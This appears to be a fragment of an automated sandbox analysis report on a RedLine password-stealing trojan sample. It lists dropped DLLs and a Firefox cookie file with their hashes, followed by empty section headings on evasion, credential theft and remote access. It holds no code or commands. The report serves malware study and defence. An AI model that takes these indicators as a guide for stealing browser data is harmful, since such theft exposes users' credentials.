C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Malware Threat Intel
Provided by